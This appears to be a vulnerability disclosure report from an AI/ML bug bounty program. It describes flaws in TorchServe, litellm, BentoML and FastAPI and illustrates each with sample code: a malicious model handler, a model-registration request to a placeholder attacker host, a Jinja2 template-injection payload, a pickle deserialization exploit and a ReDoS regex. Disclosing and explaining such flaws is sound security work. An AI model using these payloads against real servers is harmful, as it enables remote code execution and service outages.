Introduction
At Protect AI, we take a proactive approach to identifying and addressing security risks in AI systems, providing the world with critical intelligence on vulnerabilities and how to fix them.
Protect AI’s huntr is the world's first AI/ML bug bounty program. Our community of 15,000+ members hunts for impactful vulnerabilities across the entire OSS AI/ML supply chain. Through our own research and the huntr community, we’ve found that the tools used in this supply chain to build the machine learning models powering AI applications are vulnerable to unique security threats. These tools are open source, downloaded thousands of times a month to build enterprise AI systems, and often come out of the box with vulnerabilities that can lead directly to complete system takeover via attacks such as unauthorized remote code execution or local file inclusion.
This report is our largest publication to date, containing 48 vulnerabilities, a 220% increase over the 15 vulnerabilities in our first report in November. This trajectory is a testament to the efforts of our community of maintainers and researchers in helping us build a safer AI-powered world.
It is important to note that all vulnerabilities were reported to the maintainers a minimum of 45 days before this report was published, and we continue to work with maintainers to ensure a timely fix prior to publication. The table also includes our recommendations for immediate action if you have these projects in production. If you need help mitigating these vulnerabilities in the meantime, please reach out to community@protectai.com; we’re here to help.
This Month's Top Vulnerabilities
Remote Code Execution in PyTorch Serve
https://huntr.com/bounties/f18ee3d1-8390-4de3-923a-5b453ba698a7
Impact: Allows attackers to execute arbitrary code on the server hosting PyTorch Serve.
If PyTorch Serve is exposed to the network, a remote attacker can upload a model that contains malicious code. That code executes when the model is deployed, leading to remote code execution on the server. The maintainers have updated the security documentation to help users avoid vulnerable configurations.
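To illustrate the attack surface, consider how TorchServe model archives work: a .mar file bundles a custom Python handler, and TorchServe imports and runs that handler on the serving host when the model loads. The sketch below is hypothetical (the file name, class name, and command are ours, not the exploit from the report):

```python
# handler.py -- hypothetical malicious handler packaged into a .mar archive.
# TorchServe imports this module when the model is loaded, so any top-level
# or initialization code executes on the serving host.
import subprocess

class Handler:
    def initialize(self, context):
        # Illustrative only: arbitrary command execution at model load time.
        subprocess.run(["id"], check=False)

    def handle(self, data, context):
        return ["ok"]
```

If the management API (port 8081 by default) is reachable, registering such an archive from a remote URL takes a single request, e.g. `POST /models?url=http://attacker.example/malicious.mar` (attacker.example is a placeholder).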
Server-Side Template Injection in BerriAI/litellm
https://huntr.com/bounties/a9e0a164-6de0-43a4-a640-0cbfb54220a4
Impact: Enables attackers to execute unauthorized commands on the server.
The hf_chat_template method in BerriAI's litellm project processes user input through the Jinja template engine without proper sanitization. This can be exploited to execute arbitrary commands on the server.
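The underlying pattern generalizes well beyond litellm: rendering attacker-controlled text with an unsandboxed Jinja2 environment lets template expressions walk Python object internals. A minimal sketch, using a commonly cited Jinja2 payload shape rather than litellm's actual code:

```python
# Minimal SSTI illustration: rendering untrusted input as a Jinja2 template.
from jinja2 import Template

# This payload walks from `cycler`, a default template global, through its
# constructor's module globals to `os`, then runs a shell command.
user_input = "{{ cycler.__init__.__globals__.os.popen('id').read() }}"

print(Template(user_input).render())  # executes `id` on the server
```

When templates must incorporate untrusted input, Jinja2's `SandboxedEnvironment` is the usual mitigation, since it blocks access to unsafe attributes like the dunder chain above.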
Insecure Deserialization in BentoML
https://huntr.com/bounties/349a1cce-6bb5-4345-82a5-bf7041b65a68
Impact: Allows remote attackers to execute arbitrary code on the server.
BentoML is susceptible to an insecure deserialization vulnerability. By sending a specially crafted request, an attacker can execute arbitrary code on the server hosting the BentoML application.
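The root cause is a general property of Python's pickle format: unpickling can invoke arbitrary callables. This generic sketch (not BentoML's code) shows why deserializing untrusted bytes is equivalent to remote code execution:

```python
# Why unpickling untrusted data is dangerous: __reduce__ lets an object
# specify a callable (and its arguments) to run during deserialization.
import os
import pickle

class Exploit:
    def __reduce__(self):
        return (os.system, ("id",))  # illustrative command only

payload = pickle.dumps(Exploit())
pickle.loads(payload)  # runs `id` on whatever host deserializes the bytes
```

Any service that unpickles request bodies, even indirectly through a serialization helper, inherits this behavior.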
Regular Expression Denial of Service (ReDoS) in FastAPI
https://huntr.com/bounties/dd680268-d735-4f33-a358-d827694ab035
Impact: Can cause the server to become unresponsive, leading to a denial of service.
FastAPI is vulnerable to a ReDoS attack under specific conditions when parsing Form data. This vulnerability can be exploited to make the server unresponsive by consuming all available CPU resources.
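Catastrophic backtracking is easy to reproduce in isolation. The sketch below uses a deliberately vulnerable pattern of our own, not FastAPI's actual regex, to show how a short non-matching input can pin a CPU core:

```python
# Generic ReDoS demonstration: nested quantifiers force the regex engine to
# try exponentially many ways to partition the input before it can fail.
import re
import time

pattern = re.compile(r"^(a+)+$")  # deliberately vulnerable, for illustration
evil = "a" * 26 + "!"             # almost matches, then fails on the last char

start = time.time()
pattern.match(evil)
print(f"match attempt took {time.time() - start:.1f}s")
# Runtime roughly doubles with each additional 'a' in the input.
```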